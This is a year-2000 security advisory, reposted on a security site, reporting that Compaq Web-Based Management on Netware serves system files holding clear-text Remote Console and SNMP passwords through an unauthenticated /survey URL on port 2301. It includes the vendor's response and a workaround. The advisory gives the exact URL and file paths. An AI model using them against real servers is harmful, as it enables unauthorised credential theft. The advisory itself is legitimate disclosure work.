[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Compaq Web-Based Management on a Netware server reveals sensitive system files

Title: Compaq Web-Based Management on a Netware server reveals sensitive system files
Released by: iXsecurity
Date: 7th November 2000
Printable version: Click here 
iXsecurity Security Vulnerability Report

No: iXsecurity.20001107.compaq-wbm.a

====================================



Vulnerability Summary

---------------------



Problem:  The default installation of Compaq Web-Based

               Management on a Netware server reveals

               sensitive system files



Threat:   Anyone that has access to port 2301 on a

               Netware server can read the system

               password (Remote Console password)



Platform: Compaq Web-Based Management on Netware

               (Software version 2.28 verified)



Solution: Disable the Web Agent



Vulnerability Description

-------------------------

http://netware.server.with.CWBM:2301/survey is

accessible for everyone by default and contains

sensitive system files:

SYS:\SYSTEM\AUTOEXEC.NCF

SYS:\ETC\NETINFO.CFG.

The system password (Remote Console password)

and other passwords (SNMP ControlCommunity)

may be in clear text in any of these files.



Solution

--------

Compaq recommend that you disable the web agent

until a resolution has been provided.



Additional Information

----------------------

Many administrators install Compaq Web-Based Management

by default when they are installing Netware on a Compaq

machine. Web-Based Management listens on port 2301 and

anonymous access is allowed by default. iXsecurity have

to point out that none of our customers have changed

any Compaq user password until the first audit report

arrived.

Some Compaq installations have ports 49400 and 49401 open

too. These ports are not verified.



Vendor response

---------------

Mr. Vitek,



This is a known issue with an advisory available on the Compaq website as

indicated below:



http://www5.compaq.com/products/servers/management/security.html



Until a resolution has been provided, it would be recommended that you

disable the web agents as indicated in that advisory.



Thank You,

Compaq eServices

TRACKING NUMBER: A00000367277-00001144068

---------------



//Ian Vitek

mailto:ian.vitek@ixsecurity.com



-------------------------------

iXsecurity (former Infosec) is a Swedish and United

Kingdom based tigerteam that have worked with computer-

related security since 1982 and done technical security

audits (pentests) since 1996. iXsecurity is now searching

for co-workers in Sweden and UK.

Call Stafferod for more information

tel: +46-8-6621070

mailto:christer.stafferod@ixsecurity.com






(C) 1999-2000 All rights reserved.